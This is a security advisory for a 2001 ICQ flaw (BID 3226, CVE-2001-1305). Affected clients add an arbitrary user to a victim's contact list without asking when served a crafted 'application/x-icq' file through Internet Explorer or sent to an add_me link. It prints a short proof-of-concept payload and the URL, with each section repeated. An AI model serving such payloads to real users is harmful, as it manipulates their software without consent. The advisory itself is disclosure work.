ICQ Forced User Addition Vulnerability
BID:3226
Info
ICQ Forced User Addition Vulnerability
| Bugtraq ID: | 3226 |
| Class: | Design Error |
| CVE: |
CVE-2001-1305 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 22 2001 12:00AM |
| Updated: | Jul 11 2009 07:56AM |
| Credit: | This vulnerability was reported by t-Omicr0n <[email protected]> |
| Vulnerable: |
Mirabilis ICQ 2001 a Mirabilis ICQ 2000.0 b Build 3278 Mirabilis ICQ 2000.0 A |
| Not Vulnerable: |
Mirabilis ICQ 2002 a Build#3727 Mirabilis ICQ 2002 a Build#3722 |
Exploit / POC
ICQ Forced User Addition Vulnerability
If the following data is served to a victim's MSIE browser with the 'application/x-icq' Content-Type, <uin> will be added to their contact list.
[ICQ User]
UIN=<uin>
Email=
NickName=
FirstName=
LastName=
where <uin> is an ICQ UIN
It may be possible to add an arbitrary UIN on some versions of the client using the following link:
http://wwp.icq.com/whitepages/add_me/?uin=<uin>&action=add
where <uin> is the arbitrary UIN to be added to the contact list.
If the following data is served to a victim's MSIE browser with the 'application/x-icq' Content-Type, <uin> will be added to their contact list.
[ICQ User]
UIN=<uin>
Email=
NickName=
FirstName=
LastName=
where <uin> is an ICQ UIN
It may be possible to add an arbitrary UIN on some versions of the client using the following link:
http://wwp.icq.com/whitepages/add_me/?uin=<uin>&action=add
where <uin> is the arbitrary UIN to be added to the contact list.
Solution / Fix
ICQ Forced User Addition Vulnerability
Solution:
This issue has been addressed in later versions of ICQ by prompting the user whenever a contact is about to be added. It is not known exactly when this fix was incorporated into the client.
Solution:
This issue has been addressed in later versions of ICQ by prompting the user whenever a contact is about to be added. It is not known exactly when this fix was incorporated into the client.